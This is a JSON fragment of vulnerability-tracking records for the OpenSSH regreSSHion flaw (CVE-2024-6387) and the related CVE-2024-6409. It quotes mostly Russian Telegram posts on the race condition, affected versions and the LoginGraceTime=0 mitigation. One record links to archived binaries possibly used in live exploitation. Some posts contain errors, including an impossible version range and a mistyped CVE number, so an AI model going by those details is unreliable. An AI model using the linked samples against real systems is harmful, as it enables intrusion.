\u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T20:20:10.000000Z"}, {"uuid": "fffb7271-f000-4908-82c6-e0ad29ec16dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/vxunderground/4489", "content": "Security researcher raghav127001 believes he may have identified a host actively exploiting CVE-2024-6387. However, they're not sure (and neither are we).\n\nWe've archived the binaries before the identified host nukes them.\n\nPossible CVE-2024-6387: \nhttps://vx-underground.org/tmp/CVE-2024-6387", "creation_timestamp": "2024-07-03T07:03:01.000000Z"}, {"uuid": "20199d1a-c372-4b70-a68c-3b94a13f6567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/CyberSachok/1873", "content": "\u041d\u0435 \u043f\u0440\u043e\u0448\u043b\u043e \u0438 \u043c\u0435\u0441\u044f\u0446\u0430\n\n\u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0435\u0441\u044f\u0446\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RegreSSHion \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 OpenSSH. \u041f\u043e\u0441\u043b\u0435 \u0435\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u043d\u0430 \u043d\u043e\u0432\u0443\u044e \u0431\u0440\u0435\u0448\u044c \u0432\u044b\u0448\u0435\u043b \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u041f\u0435\u0441\u043b\u044f\u043a(Solar designer). \n\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c(CVE-2024-6509) \u0432 \u043d\u0430\u0431\u043e\u0440\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0434\u043b\u044f \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0432\u044f\u0437\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \n\nCVE-2024-6409 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep.\n\n\u00ab\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u0431\u0440\u0435\u0448\u0438 \u043e\u0442 CVE-2024-6387 \u2014 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u041f\u0435\u0441\u043b\u044f\u043a.\n\n\u00ab\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u0440\u0438\u0441\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u044e\u0442\u0441\u044f. \u041e\u0434\u043d\u0430\u043a\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e CVE-2024-6387 \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445\u00bb.\n\n@cybersachok", "creation_timestamp": "2024-07-12T12:39:50.000000Z"}, {"uuid": "d52a3d2e-5e75-423a-a033-a082b35a53c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/sysodmins/22375", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u2328\ufe0f\n\n\u0412 OpenSSH (\u0441 \u0432\u0435\u0440\u0441\u0438\u0438 >= 8.5 \u0438 < 4.4) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 CVE-2024-6387, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u041f\u041a \u0441\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u043e\u0439 Glibc.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0430\u0442\u0430\u043a\u0443 \u043d\u0430 32-\u0440\u0430\u0437\u0440\u044f\u0434\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441 Glibc \u0441 \u0432\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 ASLR (\u0440\u0430\u043d\u0434\u043e\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430). \u0414\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0432 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043f\u043e\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043b\u043e\u0441\u044c 6-8 \u0447\u0430\u0441\u043e\u0432, \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u043d\u0435\u043f\u0440\u0435\u0440\u044b\u0432\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0439 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 sshd \u0438\u043d\u0442\u0435\u043d\u0441\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e. \u0421\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u0443\u043f\u0440\u043e\u0449\u0430\u0435\u0442\u0441\u044f \u0438 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0431\u0435\u0437 ASLR \u0438\u043b\u0438 \u0432 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 OpenSSH, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u0430\u044f \u0440\u0430\u043d\u0434\u043e\u043c\u0438\u0437\u0430\u0446\u0438\u044f ASLR \u0434\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.\n\n\u041d\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 \u0438 \u043d\u0430 64-\u0440\u0430\u0437\u0440\u044f\u0434\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043d\u043e \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0442\u0430\u043a\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043f\u043e\u043a\u0430 \u043d\u0435 \u0433\u043e\u0442\u043e\u0432. \n\n\u041f\u0430\u0442\u0447 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 9.8.\n\n\u0422\u0438\u043f\u0438\u0447\u043d\u044b\u0439 \ud83e\udd78 \u0421\u0438\u0441\u0430\u0434\u043c\u0438\u043d", "creation_timestamp": "2024-07-02T01:19:00.000000Z"}, {"uuid": "205e6b84-c64f-418f-89d0-ea06feb688ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/sysodmins/22494", "content": "\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c OpenSSH \n\n\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-6387  (7 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS) \u0432 OpenSSH \u0431\u044b\u043b\u0430 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 regreSSHion, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432 \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 privsep.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 sshd-\u0434\u0435\u043c\u043e\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u0439 8.7p1 \u0438 8.8p1, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 Fedora 36 \u0438 37, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 Red Hat Enterprise Linux 9 (RHEL 9).", "creation_timestamp": "2024-07-17T02:18:43.000000Z"}]}